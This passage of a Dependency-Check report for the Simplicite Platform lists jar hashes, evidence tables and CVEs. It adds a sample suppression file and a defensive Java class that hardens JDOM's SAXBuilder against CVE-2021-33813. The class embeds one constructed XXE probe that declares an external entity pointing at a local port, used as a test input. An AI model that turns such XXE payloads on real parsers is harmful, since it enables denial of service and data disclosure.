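If that triage confirms that jclouds-log4j-2.2.0.jar carries no log4j-core classes, the decision is recorded in a suppression file that Dependency-Check reads on later runs, which is what the report's suppress action generates. The fragment below is an added example of such a file, not one produced by this report. It pins the rule to the jar's SHA1 from the entry above and to the six CVE IDs listed, so that an unrelated jar, or a future log4j CVE, is not silently hidden. A `<cpe>` rule would be more durable than listing CVEs, but the CPE that was matched is not visible in this extract, so none is assumed here; the text inside `<notes>` is a placeholder for the reviewer's own evidence.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<suppressions xmlns="https://jeremylong.github.io/DependencyCheck/dependency-suppression.1.3.xsd">
  <!-- Example suppression (added here; not generated by this report). -->
  <suppress>
    <notes><![CDATA[
      jclouds-log4j-2.2.0.jar is the jclouds Log4J logging driver (org.apache.jclouds.driver),
      not log4j-core. Reviewer: record the date and the jar listing that showed no
      org/apache/logging/log4j/core classes. log4j-core itself is tracked under its own entry.
    ]]></notes>
    <!-- SHA1 of the exact artifact, taken from the dependency entry above. -->
    <sha1>20ab9d90c50e6343a2a5f023dc93a2935828005f</sha1>
    <cve>CVE-2021-44228</cve>
    <cve>CVE-2017-5645</cve>
    <cve>CVE-2021-45046</cve>
    <cve>CVE-2021-44832</cve>
    <cve>CVE-2021-45105</cve>
    <cve>CVE-2020-9488</cve>
  </suppress>
</suppressions>
```

Pass the file with `--suppression suppressions.xml` (CLI) or the equivalent `suppressionFile` setting of the Maven or Gradle plugin; the report's "Vulnerabilities Suppressed" counter in the scan information then shows how many findings the rule absorbed, which is the number to watch for silent over-suppression.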

jcommander-1.35.jar
Description: A Java framework to parse command line options with annotations.
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/beust/jcommander/1.35/jcommander-1.35.jar
MD5: 90216444fab67357c5bdf3293b47107e
SHA1: 47592e181b0bdbbeb63029e08c5e74f6803c4edd
SHA256: 019c12fec1ce5c02cbabb150f6ac8a86d92a0ecc9c89a549e5537283e863000c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jcommander | High
Vendor | jar | package name | beust | Highest
Vendor | jar | package name | jcommander | Highest
Vendor | Manifest | bundle-symbolicname | com.beust.jcommander | Medium
Vendor | pom | artifactid | jcommander | Highest
Vendor | pom | artifactid | jcommander | Low
Vendor | pom | developer name | Cedric Beust | Medium
Vendor | pom | groupid | com.beust | Highest
Vendor | pom | name | JCommander | High
Vendor | pom | url | http://beust.com/jcommander | Highest
Product | file | name | jcommander | High
Product | jar | package name | beust | Highest
Product | jar | package name | jcommander | Highest
Product | Manifest | Bundle-Name | JCommander | Medium
Product | Manifest | bundle-symbolicname | com.beust.jcommander | Medium
Product | pom | artifactid | jcommander | Highest
Product | pom | developer name | Cedric Beust | Low
Product | pom | groupid | com.beust | Highest
Product | pom | name | JCommander | High
Product | pom | url | http://beust.com/jcommander | Medium
Version | file | version | 1.35 | High
Version | pom | version | 1.35 | Highest

jdom2-2.0.6.jar
Description: A complete, Java-based solution for accessing, manipulating, and outputting XML data
License: Similar to Apache License but with the acknowledgment clause removed: https://raw.github.com/hunterhacker/jdom/master/LICENSE.txt
File Path: /var/simplicite/.m2/repository/org/jdom/jdom2/2.0.6/jdom2-2.0.6.jar
MD5: 86a30c9b1ddc08ca155747890db423b7
SHA1: 6f14738ec2e9dd0011e343717fa624a10f8aab64
SHA256: 1345f11ba606d15603d6740551a8c21947c0215640770ec67271fe78bea97cf5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jdom2 | High
Vendor | jar | package name | jdom2 | Highest
Vendor | manifest: org/jdom2/ | Implementation-Vendor | jdom.org | Medium
Vendor | manifest: org/jdom2/adapters/ | Implementation-Vendor | jdom.org | Medium
Vendor | manifest: org/jdom2/filter/ | Implementation-Vendor | jdom.org | Medium
Vendor | manifest: org/jdom2/input/ | Implementation-Vendor | jdom.org | Medium
Vendor | manifest: org/jdom2/output/ | Implementation-Vendor | jdom.org | Medium
Vendor | manifest: org/jdom2/transform/ | Implementation-Vendor | jdom.org | Medium
Vendor | manifest: org/jdom2/xpath/ | Implementation-Vendor | jdom.org | Medium
Vendor | pom | artifactid | jdom2 | Highest
Vendor | pom | artifactid | jdom2 | Low
Vendor | pom | developer email | jdom@tuis.net | Low
Vendor | pom | developer email | jhunter@servlets.com | Low
Vendor | pom | developer id | hunterhacker | Medium
Vendor | pom | developer id | rolfl | Medium
Vendor | pom | developer name | Jason Hunter | Medium
Vendor | pom | developer name | Rolf Lear | Medium
Vendor | pom | groupid | org.jdom | Highest
Vendor | pom | name | JDOM | High
Vendor | pom | organization name | JDOM | High
Vendor | pom | organization url | http://www.jdom.org | Medium
Vendor | pom | url | http://www.jdom.org | Highest
Product | file | name | jdom2 | High
Product | jar | package name | adapters | Highest
Product | jar | package name | filter | Highest
Product | jar | package name | input | Highest
Product | jar | package name | jdom2 | Highest
Product | jar | package name | output | Highest
Product | jar | package name | transform | Highest
Product | jar | package name | xpath | Highest
Product | manifest: org/jdom2/ | Implementation-Title | org.jdom2 | Medium
Product | manifest: org/jdom2/ | Specification-Title | JDOM Classes | Medium
Product | manifest: org/jdom2/adapters/ | Implementation-Title | org.jdom2.adapters | Medium
Product | manifest: org/jdom2/adapters/ | Specification-Title | JDOM Adapter Classes | Medium
Product | manifest: org/jdom2/filter/ | Implementation-Title | org.jdom2.filter | Medium
Product | manifest: org/jdom2/filter/ | Specification-Title | JDOM Filter Classes | Medium
Product | manifest: org/jdom2/input/ | Implementation-Title | org.jdom2.input | Medium
Product | manifest: org/jdom2/input/ | Specification-Title | JDOM Input Classes | Medium
Product | manifest: org/jdom2/output/ | Implementation-Title | org.jdom2.output | Medium
Product | manifest: org/jdom2/output/ | Specification-Title | JDOM Output Classes | Medium
Product | manifest: org/jdom2/transform/ | Implementation-Title | org.jdom2.transform | Medium
Product | manifest: org/jdom2/transform/ | Specification-Title | JDOM Transformation Classes | Medium
Product | manifest: org/jdom2/xpath/ | Implementation-Title | org.jdom2.xpath | Medium
Product | manifest: org/jdom2/xpath/ | Specification-Title | JDOM XPath Classes | Medium
Product | pom | artifactid | jdom2 | Highest
Product | pom | developer email | jdom@tuis.net | Low
Product | pom | developer email | jhunter@servlets.com | Low
Product | pom | developer id | hunterhacker | Low
Product | pom | developer id | rolfl | Low
Product | pom | developer name | Jason Hunter | Low
Product | pom | developer name | Rolf Lear | Low
Product | pom | groupid | org.jdom | Highest
Product | pom | name | JDOM | High
Product | pom | organization name | JDOM | Low
Product | pom | organization url | http://www.jdom.org | Low
Product | pom | url | http://www.jdom.org | Medium
Version | file | version | 2.0.6 | High
Version | manifest: org/jdom2/ | Implementation-Version | 2.0.6 | Medium
Version | manifest: org/jdom2/adapters/ | Implementation-Version | 2.0.6 | Medium
Version | manifest: org/jdom2/filter/ | Implementation-Version | 2.0.6 | Medium
Version | manifest: org/jdom2/input/ | Implementation-Version | 2.0.6 | Medium
Version | manifest: org/jdom2/output/ | Implementation-Version | 2.0.6 | Medium
Version | manifest: org/jdom2/transform/ | Implementation-Version | 2.0.6 | Medium
Version | manifest: org/jdom2/xpath/ | Implementation-Version | 2.0.6 | Medium
Version | pom | version | 2.0.6 | Highest
CVE-2021-33813
An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request.
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
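Unlike the jclouds-log4j entries, this is a genuine match: the jar in the repository is jdom2 2.0.6 and the affected range runs through 2.0.6 (JDOM 2.0.6.1 is the release that addresses this CVE). Until that upgrade lands, any code that feeds untrusted XML to SAXBuilder should switch off DOCTYPE and external entity processing itself rather than rely on the library defaults. The class below is an added example, not code from the JDOM project or from the Simplicite platform: it builds a SAXBuilder with the standard SAX and Xerces feature switches, then parses a constructed benign document and a constructed XXE probe to show that the probe is rejected before any entity is resolved. The feature URIs are the ones honoured by the JDK's built-in parser; if a different XMLReader is on the classpath, confirm it supports them, since SAXBuilder.setFeature only forwards the request.

```java
import java.io.IOException;
import java.io.StringReader;

import org.jdom2.Document;
import org.jdom2.JDOMException;
import org.jdom2.input.SAXBuilder;
import org.jdom2.input.sax.XMLReaders;

/**
 * Added example (not code from the JDOM project or from the Simplicite platform):
 * a SAXBuilder configured so that untrusted XML can neither declare nor resolve
 * external entities. Needs org.jdom:jdom2 on the classpath.
 */
public final class HardenedJdomParser {

    /** A non-validating parser that rejects any DOCTYPE and never fetches external entities or DTDs. */
    public static SAXBuilder untrustedInputBuilder() {
        SAXBuilder builder = new SAXBuilder(XMLReaders.NONVALIDATING);
        // Strongest switch: no DOCTYPE at all, so no entity declarations of any kind.
        builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for XMLReaders that do not honour the Xerces-specific feature above.
        builder.setFeature("http://xml.org/sax/features/external-general-entities", false);
        builder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        builder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // JDOM-level switch: leave entity references unexpanded in the resulting tree.
        builder.setExpandEntities(false);
        return builder;
    }

    public static Document parseUntrusted(String xml) throws JDOMException, IOException {
        return untrustedInputBuilder().build(new StringReader(xml));
    }

    public static void main(String[] args) throws JDOMException, IOException {
        // Constructed inputs: a benign document and an XXE probe aimed at a closed local port.
        String benign = "<config><name>simplicite</name></config>";
        String xxe = "<?xml version=\"1.0\"?>\n"
                + "<!DOCTYPE config [<!ENTITY xxe SYSTEM \"http://127.0.0.1:9/never\">]>\n"
                + "<config><name>&xxe;</name></config>";

        Document ok = parseUntrusted(benign);   // must still parse, or the configuration is wrong
        System.out.println("benign root element: " + ok.getRootElement().getName());

        try {
            parseUntrusted(xxe);
            System.out.println("XXE probe parsed: parser is NOT hardened");
        } catch (JDOMException e) {
            // Expected: the DOCTYPE is rejected before any entity is resolved.
            System.out.println("XXE probe rejected: " + e.getMessage());
        }
    }
}
```

The disallow-doctype-decl feature is the one that matters for this CVE, because it stops the parser before it sees the SYSTEM identifier that would trigger the outbound request; the remaining three features and setExpandEntities(false) cover parsers and code paths where a DOCTYPE has to be tolerated. If the application legitimately needs inline DTDs, drop only the first feature and keep the rest.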

jempbox-1.8.16.jar
Description: The Apache JempBox library is an open source Java tool that implements Adobe's XMP(TM) specification. JempBox is a subproject of Apache PDFBox.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/pdfbox/jempbox/1.8.16/jempbox-1.8.16.jar
MD5: 1cb997cdd8302c7e19131c81ba0b7ee2
SHA1: 1f41de81768ef84ca2d8cda4cb79e9272c8ee966
SHA256: ebef7cca5a5a77768e686972b4a89f0ffce7b46907fd96ac3d4f6ce2fa038055
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jempbox | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | jempbox | Highest
Vendor | jar | package name | xmp | Highest
Vendor | Manifest | bundle-docurl | http://pdfbox.apache.org | Low
Vendor | Manifest | bundle-symbolicname | org.apache.pdfbox.jempbox | Medium
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | org.apache.pdfbox | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" | Low
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | jempbox | Highest
Vendor | pom | artifactid | jempbox | Low
Vendor | pom | groupid | org.apache.pdfbox | Highest
Vendor | pom | name | Apache JempBox | High
Vendor | pom | parent-artifactid | pdfbox-parent | Low
Product | file | name | jempbox | High
Product | jar | package name | apache | Highest
Product | jar | package name | jempbox | Highest
Product | jar | package name | xmp | Highest
Product | Manifest | bundle-docurl | http://pdfbox.apache.org | Low
Product | Manifest | Bundle-Name | Apache JempBox | Medium
Product | Manifest | bundle-symbolicname | org.apache.pdfbox.jempbox | Medium
Product | Manifest | Implementation-Title | Apache JempBox | High
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" | Low
Product | Manifest | specification-title | Apache JempBox | Medium
Product | pom | artifactid | jempbox | Highest
Product | pom | groupid | org.apache.pdfbox | Highest
Product | pom | name | Apache JempBox | High
Product | pom | parent-artifactid | pdfbox-parent | Medium
Version | file | version | 1.8.16 | High
Version | Manifest | Bundle-Version | 1.8.16 | High
Version | Manifest | Implementation-Version | 1.8.16 | High
Version | pom | version | 1.8.16 | Highest
jersey-core-1.19.1.jar
Description:
Jersey is the open source (under dual CDDL+GPL license) JAX-RS (JSR 311) production quality Reference Implementation for building RESTful Web services.
License:
http://glassfish.java.net/public/CDDL+GPL_1_1.html, http://glassfish.java.net/public/CDDL+GPL_1_1.html
File Path: /var/simplicite/.m2/repository/com/sun/jersey/jersey-core/1.19.1/jersey-core-1.19.1.jar
MD5: 577161779fabb561d73388d1ffc46b1f
SHA1: 04282d106f2acd5051bd9bc2935ed9a2920c9385
SHA256: 86c3b0f6b933478dfdd2486f047861dd2f68502e05e3c76c7dfa3968ea2b5532
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jersey-core High Vendor jar package name core Highest Vendor jar package name jersey Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl http://www.oracle.com/ Low Vendor Manifest bundle-symbolicname com.sun.jersey.core Medium Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id com.sun.jersey Medium Vendor pom artifactid jersey-core Highest Vendor pom artifactid jersey-core Low Vendor pom groupid com.sun.jersey Highest Vendor pom name jersey-core High Vendor pom parent-artifactid jersey-project Low Product file name jersey-core High Product jar package name core Highest Product jar package name jersey Highest Product jar package name sun Highest Product Manifest bundle-docurl http://www.oracle.com/ Low Product Manifest Bundle-Name jersey-core Medium Product Manifest bundle-symbolicname com.sun.jersey.core Medium Product Manifest Implementation-Title jersey-core High Product pom artifactid jersey-core Highest Product pom groupid com.sun.jersey Highest Product pom name jersey-core High Product pom parent-artifactid jersey-project Medium Version file version 1.19.1 High Version Manifest Bundle-Version 1.19.1 High Version Manifest Implementation-Version 1.19.1 High Version pom version 1.19.1 Highest
Related Dependencies:
jersey-client-1.19.1.jar
File Path: /var/simplicite/.m2/repository/com/sun/jersey/jersey-client/1.19.1/jersey-client-1.19.1.jar
MD5: b712cd1d3bb4cef01bb6fc9d5d6ddbe8
SHA1: 2df97ebd4e5c01599584c45caa3aeb563d268eef
SHA256: b358aebb99c15d9aa7dacbab8b3041618d8fe6513b9113e5fd7711421b4982d1
pkg:maven/com.sun.jersey/jersey-client@1.19.1
jersey-multipart-1.19.1.jar
File Path: /var/simplicite/.m2/repository/com/sun/jersey/contribs/jersey-multipart/1.19.1/jersey-multipart-1.19.1.jar
MD5: 1180a28161df38fc3c7cd709ca1c9abb
SHA1: b8700842c5005dab05831319bc8f072d51e26396
SHA256: 67d2b89091e6322f8d7072c0c4524936ba32b319b32823c51ba60ff8f72ef751
pkg:maven/com.sun.jersey.contribs/jersey-multipart@1.19.1
jfreechart-1.5.0.jar
Description:
JFreeChart is a class library, written in Java, for generating charts.
Utilising the Java2D APIs, it currently supports bar charts, pie charts,
line charts, XY-plots and time series plots.
License:
GNU Lesser General Public Licence: http://www.gnu.org/licenses/lgpl.txt
File Path: /var/simplicite/.m2/repository/org/jfree/jfreechart/1.5.0/jfreechart-1.5.0.jar
MD5: 7f2c7d92183516747cbe5269fa8f2201
SHA1: bc7919249bac68c15c433ed51cb798a1bf8cd74e
SHA256: ae3788e0977723ed6769d3569c6f2003df8735eca6fc108c67ad10a62a15bc5e
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jfreechart High Vendor jar package name chart Low Vendor jar package name jfree Highest Vendor jar package name jfree Low Vendor jar package name jfreechart Highest Vendor jar package name series Highest Vendor jar package name time Highest Vendor jar package name xy Highest Vendor pom artifactid jfreechart Highest Vendor pom artifactid jfreechart Low Vendor pom developer email dave@jfree.org Low Vendor pom developer name David Gilbert Medium Vendor pom developer org Object Refinery Limited Medium Vendor pom developer org URL http://www.object-refinery.com Medium Vendor pom groupid org.jfree Highest Vendor pom name JFreeChart High Vendor pom organization name JFree.org High Vendor pom organization url http://www.jfree.org/ Medium Vendor pom url http://www.jfree.org/jfreechart/ Highest Product file name jfreechart High Product jar package name chart Low Product jar package name jfree Highest Product jar package name jfreechart Highest Product jar package name series Highest Product jar package name time Highest Product jar package name xy Highest Product pom artifactid jfreechart Highest Product pom developer email dave@jfree.org Low Product pom developer name David Gilbert Low Product pom developer org Object Refinery Limited Low Product pom developer org URL http://www.object-refinery.com Low Product pom groupid org.jfree Highest Product pom name JFreeChart High Product pom organization name JFree.org Low Product pom organization url http://www.jfree.org/ Low Product pom url http://www.jfree.org/jfreechart/ Medium Version file version 1.5.0 High Version pom version 1.5.0 Highest
jhighlight-1.0.3.jar
Description:
JHighlight is an embeddable pure Java syntax highlighting
library that supports Java, HTML, XHTML, XML and LZX
languages and outputs to XHTML.
It also supports RIFE templates tags and highlights them
clearly so that you can easily identify the difference
between your RIFE markup and the actual marked up source.
License:
CDDL, v1.0: http://www.opensource.org/licenses/cddl1.php
LGPL, v2.1 or later: http://www.opensource.org/licenses/lgpl-license.php
File Path: /var/simplicite/.m2/repository/org/codelibs/jhighlight/1.0.3/jhighlight-1.0.3.jar
MD5: 318e72a07b2bbe089f0c41df45d2f484
SHA1: 88831dce3d56aa53a1bfcba78518e8939b8d4779
SHA256: 34405394e068b5d8c40ed45928ce077f8b5140bf33851a55b9cb53116ded43e5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jhighlight High Vendor jar package name fastutil Low Vendor jar package name jhighlight Highest Vendor jar package name jhighlight Low Vendor jar package name uwyn Low Vendor pom artifactid jhighlight Highest Vendor pom artifactid jhighlight Low Vendor pom groupid org.codelibs Highest Vendor pom name JHighlight High Vendor pom url codelibs/jhighlight Highest Product file name jhighlight High Product jar package name fastutil Low Product jar package name jhighlight Highest Product jar package name jhighlight Low Product pom artifactid jhighlight Highest Product pom groupid org.codelibs Highest Product pom name JHighlight High Product pom url codelibs/jhighlight High Version file version 1.0.3 High Version pom version 1.0.3 Highest
jjwt-0.4.jar
License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /var/simplicite/.m2/repository/io/jsonwebtoken/jjwt/0.4/jjwt-0.4.jar
MD5: 3c8fc46151456368494680026debae21
SHA1: 61ce246d937a0fd3acf06d3bef5fc9e3933ae812
SHA256: 64f06aa7c74916036ffe3bb96b5a1aac7d4c6c6b1914b3ea828959da2117920b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jjwt High Vendor jar package name io Highest Vendor jar package name jsonwebtoken Highest Vendor Manifest Implementation-Vendor-Id io.jsonwebtoken Medium Vendor pom artifactid jjwt Highest Vendor pom artifactid jjwt Low Vendor pom groupid io.jsonwebtoken Highest Vendor pom name JSON Web Token support for the JVM High Product file name jjwt High Product jar package name io Highest Product jar package name jsonwebtoken Highest Product Manifest Implementation-Title JSON Web Token support for the JVM High Product Manifest specification-title JSON Web Token support for the JVM Medium Product pom artifactid jjwt Highest Product pom groupid io.jsonwebtoken Highest Product pom name JSON Web Token support for the JVM High Version file version 0.4 High Version Manifest Implementation-Version 0.4 High Version pom version 0.4 Highest
jlessc-1.8.jar
Description:
A Less CSS compiler written completely in Java (pure Java).
License:
MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /var/simplicite/.m2/repository/de/inetsoftware/jlessc/1.8/jlessc-1.8.jar
MD5: fd47b0c7d5eb68328f681f698ea32316
SHA1: 8ca4880ced86c740fa65b3ad922c576066975e87
SHA256: 74bac7175cf637813ccc3fe951a96d1d6d8189428c5f7a97181bde1f817d1c32
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jlessc High Vendor jar package name less Highest Vendor Manifest automatic-module-name de.inetsoftware.jlessc Medium Vendor Manifest bundle-symbolicname de.inetsoftware.jlessc Medium Vendor Manifest Implementation-Vendor i-net software High Vendor pom artifactid jlessc Highest Vendor pom artifactid jlessc Low Vendor pom developer email vberlin@inetsoftware.de Low Vendor pom developer id vberlin Medium Vendor pom developer name Volker Berlin Medium Vendor pom developer org i-net software Medium Vendor pom developer org URL https://www.inetsoftware.de/ Medium Vendor pom groupid de.inetsoftware Highest Vendor pom name JLessC High Vendor pom url i-net-software/jlessc Highest Product file name jlessc High Product jar package name less Highest Product Manifest automatic-module-name de.inetsoftware.jlessc Medium Product Manifest bundle-symbolicname de.inetsoftware.jlessc Medium Product Manifest Implementation-Title JLessC, a Less CSS compiler High Product pom artifactid jlessc Highest Product pom developer email vberlin@inetsoftware.de Low Product pom developer id vberlin Low Product pom developer name Volker Berlin Low Product pom developer org i-net software Low Product pom developer org URL https://www.inetsoftware.de/ Low Product pom groupid de.inetsoftware Highest Product pom name JLessC High Product pom url i-net-software/jlessc High Version file version 1.8 High Version Manifest Bundle-Version 1.8 High Version Manifest Implementation-Version 1.8 High Version pom version 1.8 Highest
jlessc-ant-1.8.jar
Description:
Simple Apache Ant task for JLessC
License:
Apache License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/simplicite/ant/jlessc-ant/1.8/jlessc-ant-1.8.jar
MD5: 497812e55df43aec9955d8c88303c4c8
SHA1: a16cfcb7848fe42b76d5178fdb6234ec817891ed
SHA256: fd9a6a6146151674652ed353d16d835ae8308118faab3f6bccab43e59e2c8875
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jlessc-ant High Vendor jar package name ant Highest Vendor jar package name ant Low Vendor jar package name jlessc Highest Vendor jar package name simplicite Highest Vendor jar package name simplicite Low Vendor pom artifactid jlessc-ant Highest Vendor pom artifactid jlessc-ant Low Vendor pom groupid com.simplicite Highest Vendor pom groupid com.simplicite.ant Highest Vendor pom name JLessC Ant task High Vendor pom organization name Simplicite Software High Vendor pom organization url https://www.simplicite.io Medium Product file name jlessc-ant High Product jar package name ant Highest Product jar package name ant Low Product jar package name jlessc Highest Product jar package name jlessc Low Product jar package name simplicite Highest Product pom artifactid jlessc-ant Highest Product pom groupid com.simplicite Highest Product pom name JLessC Ant task High Product pom organization name Simplicite Software Low Product pom organization url https://www.simplicite.io Low Version file version 1.8 High Version pom version 1.8 Highest
jmatio-1.5.jar
Description:
Matlab's MAT-file I/O API in Java. Supports Matlab 5 MAT-file format reading and writing. Written in pure Java.
License:
BSD: http://www.linfo.org/bsdlicense.html
File Path: /var/simplicite/.m2/repository/org/tallison/jmatio/1.5/jmatio-1.5.jar
MD5: 6eccf45b3a4bb3dd0518afcf37b8ed35
SHA1: 517d932cc87a3b564f3f7a07ac347b725b619ab4
SHA256: 70db8cf9a1818072f290fd464f14a8369c9c58993e6640128a6e8a6379d67ac7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jmatio High Vendor jar package name jmatio Highest Vendor jar package name jmatio Low Vendor jar package name types Low Vendor pom artifactid jmatio Highest Vendor pom artifactid jmatio Low Vendor pom developer email wgradkowski@gmail.com Low Vendor pom developer id gradusnikov Medium Vendor pom developer name Wojciech Gradkowski Medium Vendor pom developer org URL https://github.com/gradusnikov Medium Vendor pom groupid org.tallison Highest Vendor pom name JMatIO High Vendor pom url tballison/jmatio Highest Product file name jmatio High Product jar package name jmatio Highest Product jar package name types Low Product pom artifactid jmatio Highest Product pom developer email wgradkowski@gmail.com Low Product pom developer id gradusnikov Low Product pom developer name Wojciech Gradkowski Low Product pom developer org URL https://github.com/gradusnikov Low Product pom groupid org.tallison Highest Product pom name JMatIO High Product pom url tballison/jmatio High Version file version 1.5 High Version pom version 1.5 Highest
jmustache-1.15.jar
Description:
A Java implementation of the Mustache templating language.
License:
The (New) BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /var/simplicite/.m2/repository/com/samskivert/jmustache/1.15/jmustache-1.15.jar
MD5: 0b166350b8b372d5caae4f0b692e016f
SHA1: 7b3b15951d13b774c76db2f4e14d977952f8b4d8
SHA256: 1aeb96b9dc17bc29540b8c3342e8e91ee974d5c604165ecd469dd76b041c250c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jmustache High Vendor jar package name mustache Highest Vendor jar package name samskivert Highest Vendor Manifest bundle-activationpolicy lazy Low Vendor Manifest bundle-symbolicname com.samskivert.jmustache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid jmustache Highest Vendor pom artifactid jmustache Low Vendor pom developer email mdb@samskivert.com Low Vendor pom developer id samskivert Medium Vendor pom developer name Michael Bayne Medium Vendor pom groupid com.samskivert Highest Vendor pom name jmustache High Vendor pom url http://github.com/samskivert/jmustache Highest Product file name jmustache High Product jar package name mustache Highest Product jar package name samskivert Highest Product Manifest bundle-activationpolicy lazy Low Product Manifest Bundle-Name jmustache Medium Product Manifest bundle-symbolicname com.samskivert.jmustache Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid jmustache Highest Product pom developer email mdb@samskivert.com Low Product pom developer id samskivert Low Product pom developer name Michael Bayne Low Product pom groupid com.samskivert Highest Product pom name jmustache High Product pom url http://github.com/samskivert/jmustache Medium Version file version 1.15 High Version pom version 1.15 Highest
jna-5.3.1.jar
Description:
Java Native Access
License:
LGPL, version 2.1: http://www.gnu.org/licenses/licenses.html
Apache License v2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/net/java/dev/jna/jna/5.3.1/jna-5.3.1.jar
MD5: df3ad04f50fb50840eeb674210200f64
SHA1: 6eb9d07456c56b9c2560722e90382252f0f98405
SHA256: 01cb505c0698d0f7acf3524c7e73acb7dc424a5bae5e9c86ce44075ab32bc4ee
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jna High Vendor jar package name jna Highest Vendor jar package name native Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest automatic-module-name com.sun.jna Medium Vendor Manifest bundle-activationpolicy lazy Low Vendor Manifest bundle-category jni Low Vendor Manifest bundle-nativecode com/sun/jna/win32-x86/jnidispatch.dll; processor=x86;osname=win32, com/sun/jna/win32-x86-64/jnidispatch.dll; processor=x86-64;osname=win32, com/sun/jna/win32-x86/jnidispatch.dll; processor=x86;osname=win, com/sun/jna/win32-x86-64/jnidispatch.dll; processor=x86-64;osname=win, com/sun/jna/w32ce-arm/jnidispatch.dll; processor=arm;osname=wince, com/sun/jna/sunos-x86/libjnidispatch.so; processor=x86;osname=sunos, com/sun/jna/sunos-x86-64/libjnidispatch.so; processor=x86-64;osname=sunos, com/sun/jna/sunos-sparc/libjnidispatch.so; processor=sparc;osname=sunos, com/sun/jna/sunos-sparcv9/libjnidispatch.so; processor=sparcv9;osname=sunos, com/sun/jna/aix-ppc/libjnidispatch.a; processor=ppc;osname=aix, com/sun/jna/aix-ppc64/libjnidispatch.a; processor=ppc64;osname=aix, com/sun/jna/linux-ppc/libjnidispatch.so; processor=ppc;osname=linux, com/sun/jna/linux-ppc64/libjnidispatch.so; processor=ppc64;osname=linux, com/sun/jna/linux-ppc64le/libjnidispatch.so; processor=ppc64le;osname=linux, com/sun/jna/linux-x86/libjnidispatch.so; processor=x86;osname=linux, com/sun/jna/linux-x86-64/libjnidispatch.so; processor=x86-64;osname=linux, com/sun/jna/linux-arm/libjnidispatch.so; processor=arm;osname=linux, com/sun/jna/linux-armel/libjnidispatch.so; processor=armel;osname=linux, com/sun/jna/linux-aarch64/libjnidispatch.so; processor=aarch64;osname=linux, com/sun/jna/linux-ia64/libjnidispatch.so; processor=ia64;osname=linux, com/sun/jna/linux-sparcv9/libjnidispatch.so; processor=sparcv9;osname=linux, com/sun/jna/linux-mips64el/libjnidispatch.so; processor=mips64el;osname=linux, com/sun/jna/linux-s390x/libjnidispatch.so; processor=S390x;osname=linux, com/sun/jna/freebsd-x86/libjnidispatch.so; processor=x86;osname=freebsd, com/sun/jna/freebsd-x86-64/libjnidispatch.so; processor=x86-64;osname=freebsd, com/sun/jna/openbsd-x86/libjnidispatch.so; processor=x86;osname=openbsd, com/sun/jna/openbsd-x86-64/libjnidispatch.so; processor=x86-64;osname=openbsd, com/sun/jna/darwin/libjnidispatch.jnilib; osname=macosx;processor=x86;processor=x86-64;processor=ppc Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Vendor Manifest bundle-symbolicname com.sun.jna Medium Vendor Manifest Implementation-Vendor JNA Development Team High Vendor Manifest specification-vendor JNA Development Team Low Vendor pom artifactid jna Highest Vendor pom artifactid jna Low Vendor pom developer email mblaesing@doppel-helix.eu Low Vendor pom developer id twall Medium Vendor pom developer name Matthias Bläsing Medium Vendor pom developer name Timothy Wall Medium Vendor pom groupid net.java.dev.jna Highest Vendor pom name Java Native Access High Vendor pom url java-native-access/jna Highest Product file name jna High Product jar package name jna Highest Product jar package name library Highest Product jar package name native Highest Product jar package name sun Highest Product jar package name 